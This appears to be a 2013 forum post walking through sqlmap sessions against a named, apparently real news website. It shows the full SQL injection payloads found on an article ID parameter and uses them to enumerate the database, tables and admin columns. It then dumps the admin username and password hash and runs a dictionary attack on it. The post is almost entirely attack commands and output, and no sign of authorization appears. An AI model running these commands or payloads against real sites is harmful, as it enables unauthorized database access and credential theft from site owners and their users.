sqlmap worked example: injecting a MySQL back end

Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the name of the current database user

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>